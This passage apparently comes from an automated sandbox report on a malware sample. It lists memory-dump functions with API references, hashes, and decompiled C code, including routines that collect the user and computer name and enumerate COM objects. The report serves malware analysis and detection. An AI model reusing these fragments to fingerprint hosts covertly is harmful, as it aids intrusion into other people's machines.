0x0118866d
0x01188673
0x0118867a
0x01188684
0x01188684
0x0118867c
0x0118867c
0x0118867c
0x0118867c
0x011886a6
0x011886ae
0x011886dc
0x011886e1
0x011886e8
0x011886ed
0x011886f1
0x01188723
0x011886f3
0x01188700
0x01188703
0x01188713
0x01188716
0x0118871c
0x0118871c
0x011886b0
0x011886bd
0x011886c0
0x011886d2
0x011886d5
0x011886d5
0x0118872d
0x01188739
0x0118872f
0x01188732
0x01188732
0x0118872d
0x011886a6
0x00000000
0x0118866d
0x01188616
0x01188619
0x01188620
0x01188626
0x01188629
0x0118862b
0x01188637
0x0118863a
0x0118863a
0x01188640
0x01188645
0x01188645
0x0118864b
0x00000000
0x0118864b
0x01188559
0x00000000
0x01188580
0x01188580
0x0118858c
0x0118859f
0x011885a5
0x011885ad
0x00000000
0x011885ad

APIs

StrChrA.SHLWAPI(01183741,0000005F,00000000,00000000,00000104), ref: 01188572
lstrcpy.KERNEL32(?,?), ref: 0118859F

Part of subcall function 01189070: lstrlen.KERNEL32(?,00000000,05A39A98,00000000,01188808,05A39C76,?,?,?,?,?,63699BC3,00000005,0118D00C), ref: 01189077
Part of subcall function 01189070: mbstowcs.NTDLL ref: 011890A0
Part of subcall function 01189070: memset.NTDLL ref: 011890B2

Part of subcall function 01185D7D: lstrlenW.KERNEL32(?,?,?,01188708,3D0118C0,80000002,01183741,0118A513,74666F53,4D4C4B48,0118A513,?,3D0118C0,80000002,01183741,?), ref: 01185DA2

Part of subcall function 0118A734: HeapFree.KERNEL32(00000000,00000000,01185637,00000000,?,?,00000000), ref: 0118A740

lstrcpy.KERNEL32(?,00000000), ref: 011885C1

Strings

(, xrefs: 01188622
\, xrefs: 011885A5

Memory Dump Source

Source File: 00000005.00000002.477260028.0000000001181000.00000020.00000001.sdmp, Offset: 01180000, based on PE: true

Associated: 00000005.00000002.477206295.0000000001180000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477354940.000000000118C000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.477409639.000000000118D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477466693.000000000118F000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
String ID: ($\
API String ID: 3924217599-1512714803
Opcode ID: eeb04e6d20d2532513d343e5f7873e24879866e3c2ce661cb55c845053e17165
Instruction ID: 579316d4b424040150fae8bc2141dc5b18eb27d4382feef4eb16ed8372bc0f47
Opcode Fuzzy Hash: eeb04e6d20d2532513d343e5f7873e24879866e3c2ce661cb55c845053e17165
Instruction Fuzzy Hash: 6D516C7210060AAFDF2EBFA4ED40E9E7BBAEF04258F50C124F91156160DB32D965DF11

Uniqueness

Uniqueness Score: -1.00%

Function 0118A199, Relevance: 7.6, APIs: 5, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0118A199() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t64 = E0118A71F(_v12 + _t43 + 2 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E0118A734(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x1181fd4
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}

0x0118a1a7
0x0118a1aa
0x0118a1ad
0x0118a1b3
0x0118a1b8
0x0118a1be
0x0118a1c6
0x0118a1c9
0x0118a1cf
0x0118a1d4
0x0118a1e1
0x0118a1ee
0x0118a1f2
0x0118a1f4
0x0118a1f8
0x0118a1fb
0x0118a20b
0x0118a25e
0x0118a25f
0x0118a20d
0x0118a212
0x0118a213
0x0118a218
0x0118a21b
0x0118a22e
0x00000000
0x0118a230
0x0118a233
0x0118a238
0x0118a246
0x0118a249
0x0118a24f
0x0118a254
0x00000000
0x0118a256
0x0118a256
0x0118a259
0x0118a259
0x0118a254
0x0118a22e
0x0118a264
0x0118a265
0x0118a1d4
0x0118a26b

APIs

GetUserNameW.ADVAPI32(00000000,01181FD2), ref: 0118A1AD
GetComputerNameW.KERNEL32(00000000,01181FD2), ref: 0118A1C9

Part of subcall function 0118A71F: RtlAllocateHeap.NTDLL(00000000,00000000,01185595), ref: 0118A72B

GetUserNameW.ADVAPI32(00000000,01181FD2), ref: 0118A203
GetComputerNameW.KERNEL32(01181FD2,?), ref: 0118A226
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,01181FD2,00000000,01181FD4,00000000,00000000,?,?,01181FD2), ref: 0118A249

Memory Dump Source

Source File: 00000005.00000002.477260028.0000000001181000.00000020.00000001.sdmp, Offset: 01180000, based on PE: true

Associated: 00000005.00000002.477206295.0000000001180000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477354940.000000000118C000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.477409639.000000000118D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477466693.000000000118F000.00000002.00000001.sdmp Download File

Similarity

API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
String ID:
API String ID: 3850880919-0
Opcode ID: 2a61c0a9e03b37916694bfd4e4c09472564cd011ed6fdfd754d0151d413fb0b6
Instruction ID: b3aa3c3a6ab1cd7d42c2259fcf9d531b71f715b9d816310da6089fdbcc093f57
Opcode Fuzzy Hash: 2a61c0a9e03b37916694bfd4e4c09472564cd011ed6fdfd754d0151d413fb0b6
Instruction Fuzzy Hash: 21214F76900208FFDB24EFE8D9849EEBBB9EF44204B10806AE602E7144E7309B45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D1F70, Relevance: 7.6, APIs: 5, Instructions: 72COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6E1D1F9A
int.LIBCPMTD ref: 6E1D1FB3

Part of subcall function 6E1CFDC0: std::_Lockit::_Lockit.LIBCPMT ref: 6E1CFDD6

Memory Dump Source

Source File: 00000005.00000002.487375933.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: LockitLockit::_std::_
String ID:
API String ID: 3382485803-0
Opcode ID: 1a30e83a6fd65de1bbb31ef5037509e33f62bfc0e2bd2dba8417d7cf25dbb149
Instruction ID: ccea0a8057b824492fa47db9ff6d2e4a4bde780ed4dc4b1144d1ef4d6f43785d
Opcode Fuzzy Hash: 1a30e83a6fd65de1bbb31ef5037509e33f62bfc0e2bd2dba8417d7cf25dbb149
Instruction Fuzzy Hash: B8311CB1D10109DFCB04CFE4D850BEEB7B5FB59714F108A1AE425A7390DB345989EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CFCD0, Relevance: 7.6, APIs: 5, Instructions: 72COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6E1CFCFA
int.LIBCPMTD ref: 6E1CFD13

Part of subcall function 6E1CFDC0: std::_Lockit::_Lockit.LIBCPMT ref: 6E1CFDD6

Memory Dump Source

Source File: 00000005.00000002.487375933.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: LockitLockit::_std::_
String ID:
API String ID: 3382485803-0
Opcode ID: 700b5ad8a0542c3023cbc5ab1a3369e610cbe09440264e196bc605f116602cc0
Instruction ID: bab263128bf03b5b9a7bf6c962b692163821b0dd6801522b288fdf473b04f104
Opcode Fuzzy Hash: 700b5ad8a0542c3023cbc5ab1a3369e610cbe09440264e196bc605f116602cc0
Instruction Fuzzy Hash: B1314DB1D00149DFCB04CFE4D840BEEB7B5FB58718F108A1AE425A7380DB385A85DB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DDF38, Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6E1DDF44

Part of subcall function 6E1DAEC6: __getptd_noexit.LIBCMT ref: 6E1DAEC9
Part of subcall function 6E1DAEC6: __amsg_exit.LIBCMT ref: 6E1DAED6

__amsg_exit.LIBCMT ref: 6E1DDF64
__lock.LIBCMT ref: 6E1DDF74
InterlockedDecrement.KERNEL32(?), ref: 6E1DDF91
InterlockedIncrement.KERNEL32(6E203218), ref: 6E1DDFBC

Memory Dump Source

Source File: 00000005.00000002.487375933.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 7be61c432093dd2632e10e2de5319130c7f3d0c544646ccef73fe6e9a2074896
Instruction ID: de6c65fc89f4aaa300a8de46f1e1d2af3e81907594e21641e1e1875de4f53395
Opcode Fuzzy Hash: 7be61c432093dd2632e10e2de5319130c7f3d0c544646ccef73fe6e9a2074896
Instruction Fuzzy Hash: 22018472904A16EBDB61EFE48454BCEB374BF15719F214606E810A7284C73469CAEFE1

Uniqueness

Uniqueness Score: -1.00%

Function 01183DE9, Relevance: 7.5, APIs: 5, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E01183DE9(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E01185AF1(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E0118A81C(_t9, _t18, _t22, _a8);
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					_push(0);
					_push(0);
					_push(0xffffffff);
					_push(0);
					_push( *((intOrPtr*)(_t22 + 0x18)));
					if( *0x118d128() != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}

0x01183de9
0x01183df6
0x01183df8
0x01183e5b
0x00000000
0x01183e5b
0x01183e10
0x01183e17
0x01183e23
0x01183e28
0x01183e2a
0x01183e2c
0x01183e2e
0x01183e30
0x01183e32
0x01183e3e
0x01183e4e
0x00000000
0x01183e40
0x01183e40
0x01183e47
0x01183e54
0x01183e54
0x01183e54
0x01183e47
0x01183e3e
0x01183e59
0x00000000
0x00000000
0x01183e5f

APIs

ResetEvent.KERNEL32(?,00000008,?,?,00000102,011867B8,?,?,00000000,00000000), ref: 01183E23
ResetEvent.KERNEL32(?), ref: 01183E28
GetLastError.KERNEL32 ref: 01183E40
GetLastError.KERNEL32(?,?,00000102,011867B8,?,?,00000000,00000000), ref: 01183E5B

Part of subcall function 01185AF1: lstrlen.KERNEL32(00000000,00000008,?,74B04D40,?,?,01183E08,?,?,?,?,00000102,011867B8,?,?,00000000), ref: 01185AFD
Part of subcall function 01185AF1: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,01183E08,?,?,?,?,00000102,011867B8,?), ref: 01185B5B
Part of subcall function 01185AF1: lstrcpy.KERNEL32(00000000,00000000), ref: 01185B6B

SetEvent.KERNEL32(?), ref: 01183E4E

Memory Dump Source

Source File: 00000005.00000002.477260028.0000000001181000.00000020.00000001.sdmp, Offset: 01180000, based on PE: true

Associated: 00000005.00000002.477206295.0000000001180000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477354940.000000000118C000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.477409639.000000000118D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477466693.000000000118F000.00000002.00000001.sdmp Download File

Similarity

API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
String ID:
API String ID: 1449191863-0
Opcode ID: 4fc367b6d65e679286b0426206c7e3ff4117458f56809f4b1ee7712680bf5397
Instruction ID: 20c05c33c61757e9cf06f673e81699be2a56a1c02af534a1b29d5284411ae2b4
Opcode Fuzzy Hash: 4fc367b6d65e679286b0426206c7e3ff4117458f56809f4b1ee7712680bf5397
Instruction Fuzzy Hash: DB01F231010311ABDA397B74EC44F4BBBA4FF45B64F14CA25F261910E0D720D805DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D7128, Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 6E1D7146

Part of subcall function 6E1DC0BA: __mtinitlocknum.LIBCMT ref: 6E1DC0D0
Part of subcall function 6E1DC0BA: __amsg_exit.LIBCMT ref: 6E1DC0DC
Part of subcall function 6E1DC0BA: RtlEnterCriticalSection.NTDLL(?), ref: 6E1DC0E4

___sbh_find_block.LIBCMT ref: 6E1D7151
___sbh_free_block.LIBCMT ref: 6E1D7160
HeapFree.KERNEL32(00000000,6E1CC9C7,6E2009A0,0000000C,6E1DC09B,00000000,6E200CD8,0000000C,6E1DC0D5,6E1CC9C7,?,?,6E1E42CF,00000004,6E200F18,0000000C), ref: 6E1D7190
GetLastError.KERNEL32(?,6E1E42CF,00000004,6E200F18,0000000C,6E1D9A60,6E1CC9C7,?,00000000,00000000,00000000,?,6E1DAE78,00000001,00000214), ref: 6E1D71A1

Memory Dump Source

Source File: 00000005.00000002.487375933.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: fcdfc5684d65e73114d3e1239060561482e5c59d5fdf6b7a7511a9db70de840d
Instruction ID: f9d175c56f9ab3eef83f1b6ab816cf69f5020d254cf8306f4dc02deeb54fbb4f
Opcode Fuzzy Hash: fcdfc5684d65e73114d3e1239060561482e5c59d5fdf6b7a7511a9db70de840d
Instruction Fuzzy Hash: B2016771805716EBDF21AFF19809BDE3668AF02765F204A06E414AA1C4CB3895C8FEA5

Uniqueness

Uniqueness Score: -1.00%

Function 01183E69, Relevance: 7.5, APIs: 5, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01183E69(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x118d26c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x118d25c = _t4;
					_t6 = GetCurrentProcessId();
					 *0x118d258 = _t6;
					 *0x118d264 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x118d254 = _t7;
					if(_t7 == 0) {
						 *0x118d254 =  *0x118d254 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}

0x01183e71
0x01183e77
0x01183e7e
0x00000000
0x01183ed8
0x01183e80
0x01183e88
0x01183e95
0x01183e95
0x01183ed5
0x00000000
0x01183ed5
0x01183e97
0x01183e97
0x01183e9c
0x01183eae
0x01183eb3
0x01183eb9
0x01183ebf
0x01183ec6
0x01183ec8
0x01183ec8
0x00000000
0x01183ecf
0x01183e91
0x00000000
0x00000000
0x01183e93
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,0118131F,?,?,00000001,?,?,?,01184EF2,?), ref: 01183E71
GetVersion.KERNEL32(?,00000001,?,?,?,01184EF2,?), ref: 01183E80
GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,01184EF2,?), ref: 01183E9C
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,01184EF2,?), ref: 01183EB9
GetLastError.KERNEL32(?,00000001,?,?,?,01184EF2,?), ref: 01183ED8

Memory Dump Source

Source File: 00000005.00000002.477260028.0000000001181000.00000020.00000001.sdmp, Offset: 01180000, based on PE: true

Associated: 00000005.00000002.477206295.0000000001180000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477354940.000000000118C000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.477409639.000000000118D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477466693.000000000118F000.00000002.00000001.sdmp Download File

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: 1eb3464357e28c695cdf0939d0d7ed134ddc7f16545763fb446fa9b15a12ca8c
Instruction ID: fd2182922f3ea5e867901d617a6c345d6c53d562b5cef18481ef7ee5d3368b2c
Opcode Fuzzy Hash: 1eb3464357e28c695cdf0939d0d7ed134ddc7f16545763fb446fa9b15a12ca8c
Instruction Fuzzy Hash: 74F04674650302ABDA3CAB6CB809B5D3B62B781BA1F14C525A532D61C8D770C082CF66

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D0930, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 160COMMON

Download Yara Rule

APIs

swprintf.LIBCMT ref: 6E1D0B10

Strings

$, xrefs: 6E1D098E
$, xrefs: 6E1D0994
l, xrefs: 6E1D0949

Memory Dump Source

Source File: 00000005.00000002.487375933.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: swprintf
String ID: $$$$l
API String ID: 233258989-1469801561
Opcode ID: 52443bb4a621a7be2ddfffd2bf410c1330d2fcc52f79a296da5eb358827bdab9
Instruction ID: 492511245ebe254a7002a083bc2b85a16b184c9dd2ee9e70f2fdb1dfabd7f368
Opcode Fuzzy Hash: 52443bb4a621a7be2ddfffd2bf410c1330d2fcc52f79a296da5eb358827bdab9
Instruction Fuzzy Hash: 73618D7090060DDFDF04CF94D954BDEBBB9FF85300F008188E599A2281EB789AA9DF52

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D0B70, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 154COMMON

Download Yara Rule

APIs

swprintf.LIBCMT ref: 6E1D0D39

Strings

$, xrefs: 6E1D0BD4
$, xrefs: 6E1D0BCE
l, xrefs: 6E1D0B89

Memory Dump Source

Source File: 00000005.00000002.487375933.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: swprintf
String ID: $$$$l
API String ID: 233258989-1469801561
Opcode ID: 52fca279738827149985762420c34ae21167073c3af1ee69eb832235fd5d1ab2
Instruction ID: e8f4bc2df14076b5fcd6d870665b7f11dfdaf01eba6886853da5e6df6e990ac2
Opcode Fuzzy Hash: 52fca279738827149985762420c34ae21167073c3af1ee69eb832235fd5d1ab2
Instruction Fuzzy Hash: BD518A7090460DDFDB14CF94D954BEEBBB9FF49304F4080C9E898A2280DB389AA8DF55

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D5373, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

___addlocaleref.LIBCMT ref: 6E1D5385
___removelocaleref.LIBCMT ref: 6E1D5390
___freetlocinfo.LIBCMT ref: 6E1D53A4

Part of subcall function 6E1D50DC: ___free_lconv_mon.LIBCMT ref: 6E1D5122
Part of subcall function 6E1D50DC: ___free_lconv_num.LIBCMT ref: 6E1D5143
Part of subcall function 6E1D50DC: ___free_lc_time.LIBCMT ref: 6E1D51C8

Strings

8, n, xrefs: 6E1D539B

Memory Dump Source

Source File: 00000005.00000002.487375933.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: ___addlocaleref___free_lc_time___free_lconv_mon___free_lconv_num___freetlocinfo___removelocaleref
String ID: 8, n
API String ID: 4212647719-436394027
Opcode ID: 6436e44ada5f95e71714471ce071a405565744063d5ad551668095af45789b17
Instruction ID: 911413bb0842dad2cc0b7a207cff4fd2fe98fd411f03afb68dae07f87718ae34
Opcode Fuzzy Hash: 6436e44ada5f95e71714471ce071a405565744063d5ad551668095af45789b17
Instruction Fuzzy Hash: 58E0DF23905C22E9C69115DCA4503AF63A9DFA2711B32040AE860AB048DBA0CCCC7190

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D0460, Relevance: 6.2, APIs: 4, Instructions: 188COMMON

Download Yara Rule

APIs

std::ios_base::getloc.LIBCPMTD ref: 6E1D04E2
numpunct.LIBCPMTD ref: 6E1D053F

Memory Dump Source

Source File: 00000005.00000002.487375933.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: numpunctstd::ios_base::getloc
String ID:
API String ID: 1901892925-0
Opcode ID: 0233795f5a217f9f8370ecf7e4454019d27c871b4bcbe9bf4fefdc947d532429
Instruction ID: c21d47d5ae941d74f5e4d546c88061d539d344908803ea8327f1dff19b171ecd
Opcode Fuzzy Hash: 0233795f5a217f9f8370ecf7e4454019d27c871b4bcbe9bf4fefdc947d532429
Instruction Fuzzy Hash: 9A8160B19001589FCB04CFA8C951BEEBBB9BF58304F108598F519E7290DB34AE84DF91

Uniqueness

Uniqueness Score: -1.00%

Function 0118391F, Relevance: 6.2, APIs: 4, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 0118395A
SysFreeString.OLEAUT32(00000000), ref: 01183A3F

Part of subcall function 01186F3A: SysAllocString.OLEAUT32(0118C290), ref: 01186F8A

SafeArrayDestroy.OLEAUT32(00000000), ref: 01183A92
SysFreeString.OLEAUT32(00000000), ref: 01183AA1

Part of subcall function 01181AE2: Sleep.KERNEL32(000001F4), ref: 01181B2A

Memory Dump Source

Source File: 00000005.00000002.477260028.0000000001181000.00000020.00000001.sdmp, Offset: 01180000, based on PE: true

Associated: 00000005.00000002.477206295.0000000001180000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477354940.000000000118C000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.477409639.000000000118D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477466693.000000000118F000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree$ArrayDestroySafeSleep
String ID:
API String ID: 3193056040-0
Opcode ID: 176c1396987a984ae0378124a2cbd73a3916cf5460c5a70ecadb1c5bdc88d5a9
Instruction ID: 4d82a61841df9cd6379cb3f39b29a7156f318d706722ab0c1d782f49fdbf605d
Opcode Fuzzy Hash: 176c1396987a984ae0378124a2cbd73a3916cf5460c5a70ecadb1c5bdc88d5a9
Instruction Fuzzy Hash: FA516035900609AFDB15EFA8C844A9EF7B6BF88744B148429E615DB220DB31DD46CF50

Uniqueness

Uniqueness Score: -1.00%

Function 01186F3A, Relevance: 6.2, APIs: 4, Instructions: 154
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E01186F3A(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x118d2a8; // 0x48aa5a8
					_t5 = _t103 + 0x118e038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x118c290);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x118d2a8; // 0x48aa5a8
												_t28 = _t109 + 0x118e0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x118d2a8; // 0x48aa5a8
														_t33 = _t79 + 0x118e078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}

0x01186f3f
0x01186f48
0x01186f49
0x01186f4d
0x01186f53
0x01186f59
0x01186f62
0x01186f68
0x01186f72
0x01186f74
0x01186f7a
0x01186f7f
0x01186f8a
0x01186f90
0x01186f95
0x011870b7
0x01186f9b
0x01186f9b
0x01186fa8
0x01186fae
0x01186fb4
0x01186fb8
0x01186fbe
0x01186fcb
0x01186fcf
0x01186fd5
0x01186fd8
0x01186fe0
0x01186fe1
0x01186fe5
0x01186fe9
0x01186fec
0x01186fef
0x01186ff5
0x01186ffe
0x01187004
0x01187005
0x01187008
0x01187009
0x0118700a
0x01187012
0x01187013
0x01187014
0x01187016
0x0118701a
0x0118701e
0x00000000
0x00000000
0x01187024
0x0118702d
0x01187033
0x0118703d
0x01187041
0x01187043
0x01187050
0x01187054
0x0118705c
0x01187061
0x01187073
0x01187075
0x0118707b
0x0118707b
0x01187084
0x01187084
0x01187086
0x0118708c
0x0118708c
0x0118708f
0x01187095
0x01187098
0x011870a1
0x00000000
0x00000000
0x00000000
0x011870a1
0x01186ff5
0x01186fef
0x01186fd8
0x011870a7
0x011870a7
0x011870ad
0x011870ad
0x011870b3
0x011870b3
0x011870bc
0x011870c2
0x011870c2
0x01186f7f
0x011870cb

APIs

SysAllocString.OLEAUT32(0118C290), ref: 01186F8A
lstrcmpW.KERNEL32(00000000,0076006F), ref: 0118706B
SysFreeString.OLEAUT32(00000000), ref: 01187084
SysFreeString.OLEAUT32(?), ref: 011870B3

Memory Dump Source

Source File: 00000005.00000002.477260028.0000000001181000.00000020.00000001.sdmp, Offset: 01180000, based on PE: true

Associated: 00000005.00000002.477206295.0000000001180000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477354940.000000000118C000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.477409639.000000000118D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477466693.000000000118F000.00000002.00000001.sdmp Download File

Similarity

API ID: String$Free$Alloclstrcmp
String ID:
API String ID: 1885612795-0
Opcode ID: 60096ef45f99e959e1ed1df9cc5d4a89292afca87d11e987924b1922558d98f8
Instruction ID: 46de9283b89dee5f500d093ad0d971fbe342e88b043c73c57e8732fa193ea189
Opcode Fuzzy Hash: 60096ef45f99e959e1ed1df9cc5d4a89292afca87d11e987924b1922558d98f8
Instruction Fuzzy Hash: 90518175D00109EFCB14EFA8C888DAEF7B5EF89304B248594E915EB254D7319D42CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D78CF, Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

__flush.LIBCMT ref: 6E1D7993
__fileno.LIBCMT ref: 6E1D79B3
__locking.LIBCMT ref: 6E1D79BA
__flsbuf.LIBCMT ref: 6E1D79E5

Part of subcall function 6E1D8C2B: __getptd_noexit.LIBCMT ref: 6E1D8C2B

